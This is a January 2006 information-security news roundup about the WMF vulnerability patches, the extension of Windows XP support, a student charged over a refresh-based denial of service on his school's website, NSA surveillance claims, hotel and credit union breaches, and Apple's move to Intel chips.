Site Network: Beskerming.com | Skiifwrald.com | Jongsma & Jongsma

Innovation in Information Security

Coverage of important Information Security and Information Technology news and events from the research team at S?nnet Beskerming.

Username: | Password: Contact us to request an account

Privacy Matters

The recent problems with the WMF image format, which led to Microsoft releasing an out of cycle patch a couple of weeks ago, have impacted on Microsoft's next operating system, Vista, even though it hasn't been released yet. Patches have been released for the Beta users of Vista, to help keep their installations secure from the image handling vulnerability. The previous information available about the flaw did not mention Vista as being vulnerable, and it is an early bloody nose for the new Operating System, which is said to be the most secure that Microsoft has ever developed.

The lack of a patch for Windows 9x derived Operating Systems for the same vulnerability has concerned some users, given that they have various requirements to keep older systems running on deprecated software. Microsoft have explained their lack of patching by explaining that the only exploitation route for these older systems is to require a user to print a document / image which makes calls to the vulnerable functions, and that it can not be called from other system actions.

An article was published last week in which it was claimed that the original WMF vulnerability was an intentional backdoor installed by Microsoft into their systems to allow certain parties unrestricted access to systems. Unfortunately for this argument there are several facts which negate it. If it is a backdoor into a system, it is somewhat odd as it requires the user to have some level of interaction with the vulnerability in order for any exploit to take effect (that is, it can not be fully automated). Secondly, software which recreates a number of Windows APIs under Linux, such as WINE, also demonstrate the WMF vulnerability. This negates the original claims because the WMF support in the software was developed from the original API specification. This means that the root cause for the vulnerability lies in the API specification, which is somewhere that is not normal for hidden backdoors to be specified.

Good news, however, for users of Microsoft's current Consumer / Pro Operating System Windows XP, with publication of information on Microsoft's extension of support for their current Operating System version (XP). Normally mainstream support would have ended on December 31, 2006, but due to the delays that have been encountered with releasing the next version of Windows (Vista), this date has been extended to an unconfirmed date two years after the release of Vista. Mainstream support means Microsoft will continue to supply security patches and hotfixes for the software until the end date, and Extended support for business users will continue for another five years beyond that (continuing to supply hotfixes).

A US High School student has discovered to his detriment that certain forms of online pranking can have serious real world outcomes. The student is being charged with a felony for encouraging other students to continually refresh their school's public website in their Internet browser, in order to deny service to other site visitors (or even to cause the site to crash). Ultimately, what the student encouraged was a distributed Denial of Service (dDoS), whereby numerous requests are sent from a wide variety of Internet addresses, ultimately preventing legitimate users access to a website. Due to the large number of source IP addresses, this sort of attack is very difficult to prevent against.

It is reported that the student's intent was to cause an outage of the school's website, but it is debatable whether he should have been charged with a felony for the case (perhaps a stern warning and a suspension from school would have been better). Online rights activists are all riled up over the case, with many claiming that by simply refreshing a webpage (which many would do anyway), it now makes them a criminal.

The above case alone wouldn't have stood out, except for new laws being passed in the United States which makes various forms of online stalking illegal. While the concept is well intentioned, the implementation probably doesn't take into account some of the finer points of how the Internet works. Even posting to a newsgroup or web forum could become illegal under these new laws.

To finish up the concerns over privacy, an ex-NSA employee went public about surveillance programs that the US was said to be running against its own citizens. With claim and counterclaim being thrown about with regards to the veracity of the ex-employee's claims, the mere publication of them throws up a range of concerns about the information gathering capabilities of a range of three letter agencies and also how those capabilities have been used against the people they are meant to protect. Some observers have even gone so far as to claim that a new form of McCarthyism has started to emerge amongst the agencies and Governments monitoring online activities.

Although the ex-employee claims that what he has released is at an appropriate classification level, observers who subscribe to the 'tip of the iceberg' approach were sent into a flurry of speculation as to what else the NSA is currently capable of doing, and what it is actually doing.

In the latest loss of identity data from a hotel group (following on from the Marriott losses), the Atlantis Resort in the Bahamas has disclosed that 50,000 identity records were stolen from a hotel database. No timeframe is given for when the compromise took place, but the resort has committed to providing 12 months of credit monitoring for affected individuals, has commenced notifying each person who was affected, and is working with law enforcement agencies to investigate the matter.

An attack directly against a target can net better results sometimes. A Credit Union in the United States had its website hacked recently, resulting in the theft of tens of thousands of US Dollars from Credit Union clients. The hack was achieved by redirecting the login script on the official site to a site in Greece which had been setup to mimic the look and feel of the legitimate banking solution. Because the implicit trust was already there (having logged on through the legitimate Credit Union site), clients were more inclined to believe the site even though it didn't appear exactly as the official site did.

The Credit Union was forced to take down their site while the issue was being resolved, and has also taken a credibility hit over the attack. Information Security company, Sunbelt, have also provided in depth details of some malware which redirects requests for a number of financial institutions to an excellent forgery of the sites (would be very difficult to determine), while still appearing as legitimate in the URL address bar.

Finally, the first Apple Macintosh machines with Intel chips powering them are scheduled for shipping in February. Although Apple has said that they will not prevent anyone from dual booting Windows and OS X on the Intel-based machines, and Apple and Microsoft have agreed to a five year arrangement where Microsoft will continue to develop software for OS X, the first warning shot may have been fired back by Microsoft. Microsoft have announced that they are to cease development of the Windows Media Player for OS X. In its place, they have provided a link to a third party provider who has specialised in providing additional support for OS X users who require to play back Windows media content.

16 January 2006

Social bookmark this page at eKstreme.
Alternatively, Bookmark or Share via AddThis

Do you like how we cover Information Security news? How about checking out our company services, delivered the same way our news is.

Let our Free OS X Screen Saver deliver the latest security alerts and commentary to your desktop when you're not at your system.

Comments will soon be available for registered users.